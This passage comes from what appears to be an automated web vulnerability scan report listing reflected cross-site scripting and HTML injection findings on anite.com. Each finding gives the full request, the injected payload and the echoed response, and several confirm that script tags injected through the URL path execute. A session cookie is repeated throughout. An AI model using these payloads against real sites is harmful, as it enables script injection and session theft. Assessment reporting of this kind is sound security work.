Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/ca6f1"><script>alert(1)</script>e3cc205f34c#up">
...[SNIP]...

1.176. http://anite.com/nemo-wireless-network-measurement-solutions-anite.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-wireless-network-measurement-solutions-anite.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a09"><a>1789a05579b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-wireless-network-measurement-solutions-anite.html?b1a09"><a>1789a05579b=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-wireless-network-measurement-solutions-anite.html?b1a09"><a>1789a05579b=1#up">
...[SNIP]...

1.177. http://anite.com/network-testing-office-locations.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/network-testing-office-locations.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f667"><a>99a950544f8 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /network-testing-office-locations.html?Itemid=4857f667"><a>99a950544f8 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:12:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:12:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/network-testing-office-locations.html?Itemid=4857f667"><a>99a950544f8#up">
...[SNIP]...

1.178. http://anite.com/network-testing-office-locations.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/network-testing-office-locations.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a17f6"><script>alert(1)</script>0741e7581ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a17f6"><script>alert(1)</script>0741e7581ca HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:13:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/a17f6"><script>alert(1)</script>0741e7581ca#up">
...[SNIP]...

1.179. http://anite.com/network-testing-office-locations.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/network-testing-office-locations.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34969"><a>e6e627d1eb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /network-testing-office-locations.html?34969"><a>e6e627d1eb1=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:13:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/network-testing-office-locations.html?34969"><a>e6e627d1eb1=1#up">
...[SNIP]...

1.180. http://anite.com/network-testing-previous-news.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/network-testing-previous-news.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f973e"><script>alert(1)</script>4d0f68b47d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f973e"><script>alert(1)</script>4d0f68b47d0 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:19:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/f973e"><script>alert(1)</script>4d0f68b47d0#up">
...[SNIP]...

1.181. http://anite.com/network-testing-previous-news.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/network-testing-previous-news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 785be"><a>e299f792824 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /network-testing-previous-news.html?785be"><a>e299f792824=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:19:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/network-testing-previous-news.html?785be"><a>e299f792824=1#up">
...[SNIP]...

1.182. http://anite.com/networktestingnews.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/networktestingnews.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 399d8"><script>alert(1)</script>c9807174ae9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /399d8"><script>alert(1)</script>c9807174ae9 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:11:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/399d8"><script>alert(1)</script>c9807174ae9#up">
...[SNIP]...

1.183. http://anite.com/networktestingnews.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/networktestingnews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2efd"><a>9c2a7e2458c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /networktestingnews.html?f2efd"><a>9c2a7e2458c=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:10:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/networktestingnews.html?f2efd"><a>9c2a7e2458c=1#up">
...[SNIP]...

1.184. http://anite.com/optimisation-anite.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/optimisation-anite.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53fd5"><script>alert(1)</script>7b008771cb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /53fd5"><script>alert(1)</script>7b008771cb4 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/53fd5"><script>alert(1)</script>7b008771cb4#up">
...[SNIP]...

1.185. http://anite.com/optimisation-anite.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/optimisation-anite.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca18a"><a>21dfc817bad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /optimisation-anite.html?ca18a"><a>21dfc817bad=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/optimisation-anite.html?ca18a"><a>21dfc817bad=1#up">
...[SNIP]...

1.186. http://anite.com/post-processing-networkmeasurement.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/post-processing-networkmeasurement.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 999b0"><a>d878c82be93 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /post-processing-networkmeasurement.html?Itemid=452999b0"><a>d878c82be93 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:10:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/post-processing-networkmeasurement.html?Itemid=452999b0"><a>d878c82be93#up">
...[SNIP]...

1.187. http://anite.com/post-processing-networkmeasurement.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/post-processing-networkmeasurement.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9207"><script>alert(1)</script>186c88a26c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c9207"><script>alert(1)</script>186c88a26c9 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:10:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/c9207"><script>alert(1)</script>186c88a26c9#up">
...[SNIP]...

1.188. http://anite.com/post-processing-networkmeasurement.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/post-processing-networkmeasurement.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 341eb"><a>d1277ff831a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /post-processing-networkmeasurement.html?341eb"><a>d1277ff831a=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:10:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/post-processing-networkmeasurement.html?341eb"><a>d1277ff831a=1#up">
...[SNIP]...

1.189. http://anite.com/quality-testing-networkmeasurement.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/quality-testing-networkmeasurement.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a059e"><a>aa5c6d6de0b was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quality-testing-networkmeasurement.html?Itemid=449a059e"><a>aa5c6d6de0b HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:10:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/quality-testing-networkmeasurement.html?Itemid=449a059e"><a>aa5c6d6de0b#up">
...[SNIP]...

1.190. http://anite.com/quality-testing-networkmeasurement.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/quality-testing-networkmeasurement.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a0f9"><script>alert(1)</script>8be7096d64e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8a0f9"><script>alert(1)</script>8be7096d64e HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:10:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

